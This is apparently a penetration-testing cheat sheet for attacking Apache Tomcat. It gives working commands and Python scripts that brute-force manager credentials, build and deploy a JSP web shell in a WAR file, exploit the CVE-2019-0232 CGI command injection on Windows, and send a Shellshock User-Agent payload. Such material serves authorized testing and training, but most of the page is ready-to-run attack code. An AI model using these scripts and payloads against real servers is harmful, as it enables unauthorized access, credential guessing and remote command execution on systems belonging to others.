Version#

The documentation index shipped with Tomcat puts the exact version in its title (e.g. "Apache Tomcat 9 (9.0.17) - Documentation Index"); the default error page also prints "Apache Tomcat/9.0.17" in its footer unless custom error pages are configured.

curl -s "http://$target/docs/" | grep -i tomcat

Login brute force#

Metasploit's tomcat_mgr_login module ships with default-credential lists (its USER_FILE / PASS_FILE defaults):

  • /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt
  • /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt

msfconsole
use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS <IP>
set VHOST <Domain name>
set RPORT <http(s) port>
set SSL true
set STOP_ON_SUCCESS true
run

Set SSL only when the manager is served over HTTPS. The default server.xml wraps the realm in a LockOutRealm (5 failures lock the user out for 5 minutes, and during the lockout even the correct password gets a 401), so a long password list per user produces false negatives.
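The same check without Metasploit, as an added example written for this page (not the author's or Metasploit's code): it tries HTTP Basic auth pairs against the manager, treats 200 and 403 as valid credentials (403 means the account exists but lacks manager-gui), and stops trying a user once it reaches the LockOutRealm threshold. The credential sample is a constructed illustration, not the full Metasploit lists, and the `fetch` parameter exists so the transport can be swapped out.

```python
import base64
import urllib.error
import urllib.request

# Constructed sample of default manager credentials (the Metasploit lists
# above are longer; these are illustrative).
DEFAULT_USERS = ["tomcat", "admin", "manager", "role1", "both"]
DEFAULT_PASSWORDS = ["tomcat", "admin", "manager", "s3cret", "role1", "password", ""]
LOCKOUT_FAILURES = 5  # Tomcat's default LockOutRealm failureCount


def basic_auth_header(user: str, password: str) -> str:
    """Authorization header value for HTTP Basic auth."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def http_status(url: str, headers: dict) -> int:
    """Real transport: GET with the given headers, return the status code."""
    req = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as exc:
        return exc.code


def brute_force_manager(url, users=DEFAULT_USERS, passwords=DEFAULT_PASSWORDS,
                        fetch=http_status, stop_on_success=True):
    """Try every user/password pair against the manager URL.

    200 = valid credentials with manager-gui, 403 = valid credentials without
    it (still a finding), anything else = wrong pair. Returns the list of
    (user, password, status) hits and the set of users that reached the
    LockOutRealm threshold (further attempts for them are unreliable, so we
    stop early instead of burning the rest of the list).
    """
    hits, locked = [], set()
    for user in users:
        failures = 0
        for password in passwords:
            status = fetch(url, {"Authorization": basic_auth_header(user, password)})
            if status in (200, 403):
                hits.append((user, password, status))
                if stop_on_success:
                    return hits, locked
            else:
                failures += 1
                if failures >= LOCKOUT_FAILURES:
                    locked.add(user)
                    break
    return hits, locked


if __name__ == "__main__":
    import sys
    found, locked_users = brute_force_manager(sys.argv[1])  # e.g. http://target:8080/manager/html
    for user, password, status in found:
        print(f"[+] {user}:{password} ({status})")
    for user in locked_users:
        print(f"[!] {user} hit the lockout threshold; retry after 5 minutes")
```

Run it against the manager URL; a `[!]` line means the remaining passwords for that user were never really tested.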

RCE#

Upload malicious WAR file#

Browse to /manager/html and authenticate (the account needs the manager-gui role). Package a JSP shell as a WAR; a WAR is just a zip, and Tomcat deploys it even without WEB-INF/web.xml because the global web.xml already maps *.jsp to the JSP servlet:

curl https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp -O
zip -r backup.war cmd.jsp

Upload backup.war through the "WAR file to deploy" form. It is deployed at the context path /backup (the WAR's base name): click it in the application list and open cmd.jsp?cmd=id.

Or, from the command line:

curl "http://$target/backup/cmd.jsp?cmd=id"

Undeploy it from the same page when you are done, otherwise the shell stays behind on the host.
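The upload step scripted, as an added example written for this page (not the author's code and not the fuzzdb shell): it builds the WAR in memory with a minimal constructed JSP shell and deploys it through the manager's text API (PUT /manager/text/deploy), which needs the manager-script role rather than manager-gui. The `send` parameter is an assumption so the transport can be replaced; everything else uses the standard library.

```python
import io
import urllib.parse
import urllib.request
import zipfile
from base64 import b64encode

# Minimal JSP shell constructed for this example (same idea as the fuzzdb
# cmd.jsp above): runs the `cmd` parameter and prints its stdout.
CMD_JSP = r'''<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = r.readLine()) != null) { out.println(line); }
}
%>
'''


def build_war(files: dict) -> bytes:
    """Pack {path_in_archive: content} into a WAR. A WAR is a zip; Tomcat deploys
    it without WEB-INF/web.xml, the global web.xml then handles *.jsp."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()


def war_entries(war: bytes) -> list:
    """File names inside a WAR, to sanity-check the archive before uploading."""
    with zipfile.ZipFile(io.BytesIO(war)) as zf:
        return zf.namelist()


def http_put(url, headers, body):
    """Real transport for the deploy call."""
    req = urllib.request.Request(url, data=body, headers=headers, method="PUT")
    with urllib.request.urlopen(req, timeout=60) as resp:
        return resp.read().decode()


def deploy_war(base, user, password, path, war, send=http_put):
    """Deploy through the manager text API: PUT /manager/text/deploy?path=/x&update=true
    with the WAR as the body. Requires the manager-script role; manager-gui alone
    only gets you the HTML upload form at /manager/html."""
    url = f"{base}/manager/text/deploy?path={urllib.parse.quote(path)}&update=true"
    headers = {
        "Authorization": "Basic " + b64encode(f"{user}:{password}".encode()).decode(),
        "Content-Type": "application/octet-stream",
    }
    return send(url, headers, war)


def deployed_ok(manager_reply: str) -> bool:
    """The text API answers 'OK - ...' on success and 'FAIL - ...' otherwise."""
    return manager_reply.startswith("OK")


def shell_url(base, path, command):
    """URL that runs `command` through the deployed cmd.jsp."""
    return f"{base}{path}/cmd.jsp?cmd={urllib.parse.quote(command)}"


if __name__ == "__main__":
    import sys
    base, user, password = sys.argv[1:4]  # e.g. http://target:8080 tomcat s3cret
    war = build_war({"cmd.jsp": CMD_JSP})
    reply = deploy_war(base, user, password, "/backup", war)
    print(reply.strip())
    if deployed_ok(reply):
        print("try:", shell_url(base, "/backup", "id"))
```

The same API removes the app again with /manager/text/undeploy?path=/backup, which is the cleanup step to run before leaving the host.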

Tomcat CGI command injection#

Versions: 9.0.0.M1 -> 9.0.17, 8.5.0 -> 8.5.39, 7.0.0 -> 7.0.93 (CVE-2019-0232)

Affects Tomcat on Windows with the CGI servlet enabled and enableCmdLineArguments set to true. The CGI servlet is off by default; enableCmdLineArguments was on by default in 7.0.x and 8.5.x until the fix and off by default in 9.0.x.

A query string that contains no "=" is passed to the script as command-line arguments (the CGI "indexed query" convention). On Windows a .bat script runs through cmd.exe, where "&" separates commands, so ?&<command> is executed as welcome.bat & <command>:

curl -s "http://$target/cgi/welcome.bat?&c%3A%5Cwindows%5Csystem32%5Cwhoami.exe"

welcome.bat is only an example name; any existing .bat script under the CGI path works.
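A pre-check and URL builder for this bug, as an added example written for this page (not the author's code): it parses the version string the Version section above pulls from /docs/ (or the error-page footer), tests it against the affected ranges listed here, and percent-encodes the command the way the curl line does while leaving the leading "&" raw. The `/cgi/` prefix and script name are assumptions taken from the curl line; adjust them to the target's CGI mapping.

```python
import re
import urllib.parse

# Last affected patch level per branch, from the ranges above.
LAST_AFFECTED = {(9, 0): 17, (8, 5): 39, (7, 0): 93}

# Matches "Apache Tomcat/9.0.17" (error-page footer) and
# "Apache Tomcat 9 (9.0.17)" (/docs/ title), including 9.0.0.Mx milestones.
VERSION_RE = re.compile(r"Apache Tomcat(?:/| \d+ \()(\d+)\.(\d+)\.(\d+)(?:\.M(\d+))?")


def parse_version(text):
    """Return (major, minor, patch, milestone) or None. milestone is None for GA builds."""
    m = VERSION_RE.search(text)
    if not m:
        return None
    major, minor, patch, ms = m.groups()
    return int(major), int(minor), int(patch), (int(ms) if ms else None)


def cgi_injection_affected(version):
    """True when the version is inside one of the affected ranges; milestone
    builds of 9.0.0 are earlier than 9.0.1, so patch 0 covers them."""
    major, minor, patch, _milestone = version
    last = LAST_AFFECTED.get((major, minor))
    return last is not None and patch <= last


def cgi_injection_url(base, script, command):
    """Build the injection URL. The query string must contain no literal '='
    (otherwise the CGI servlet does not pass it as arguments); the '&' stays raw
    so cmd.exe sees '<script> & <command>', and the command is percent-encoded."""
    return f"{base}/cgi/{script}?&" + urllib.parse.quote(command, safe="")


if __name__ == "__main__":
    import sys
    import urllib.request
    base = sys.argv[1]  # e.g. http://target:8080
    with urllib.request.urlopen(f"{base}/docs/", timeout=10) as resp:
        version = parse_version(resp.read().decode(errors="replace"))
    print("version:", version)
    if version and cgi_injection_affected(version):
        print("in affected range; try:")
        print(cgi_injection_url(base, "welcome.bat", r"c:\windows\system32\whoami.exe"))
```

A version inside the range only means the code is present; the CGI servlet and enableCmdLineArguments still have to be on, so the URL is the actual test.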

Tomcat CGI Shellshock#

Bash version: unpatched Bash up to and including 4.3 (CVE-2014-6271 and its follow-ups)

The CGI servlet exports request headers to the script as environment variables, so the User-Agent header arrives as HTTP_USER_AGENT. Vulnerable Bash treats any environment variable whose value starts with "() {" as a function definition and also executes whatever follows the closing brace, so a CGI script run by Bash (a #!/bin/bash script, or one that spawns a shell) runs the injected command before its own code. The two echos print the blank line that terminates the CGI response headers, so the command's output comes back in the response body instead of Tomcat answering 500 because of malformed headers.

curl -H 'User-Agent: () { :; }; echo; echo; /bin/whoami' "http://$target/cgi-bin/access.cgi"
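A non-destructive check for the same thing, as an added example written for this page (not the author's code): it injects an `echo` of a unique marker instead of a real command and reports the script as vulnerable only if the marker shows up in the response body. The marker value and the `fetch` parameter (so the transport can be swapped) are assumptions; the path must be a CGI script that Bash actually executes.

```python
import urllib.error
import urllib.request

MARKER = "shellshock-probe-7f3a"  # constructed marker; any string unlikely to appear naturally works


def shellshock_header(command: str) -> str:
    """User-Agent value: a Bash function definition followed by the command.
    Vulnerable Bash imports the variable as a function and runs the trailing
    text; the two echos end the CGI headers so the output lands in the body."""
    return "() { :; }; echo; echo; " + command


def http_get(url, headers):
    """Real transport: GET and return (status, body), including error bodies."""
    req = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as exc:
        return exc.code, exc.read().decode(errors="replace")


def probe_shellshock(url, fetch=http_get):
    """Inject 'echo MARKER' and look for the marker in the body.
    Returns (vulnerable, status). A 500 without the marker is inconclusive:
    the script may not be run by Bash, or the output may have been discarded."""
    status, body = fetch(url, {"User-Agent": shellshock_header(f"echo {MARKER}")})
    return MARKER in body, status


if __name__ == "__main__":
    import sys
    vulnerable, status = probe_shellshock(sys.argv[1])  # e.g. http://target:8080/cgi-bin/access.cgi
    print(f"HTTP {status}: {'VULNERABLE' if vulnerable else 'marker not returned'}")
```

Once the probe returns the marker, the curl line above with a real command is the exploitation step.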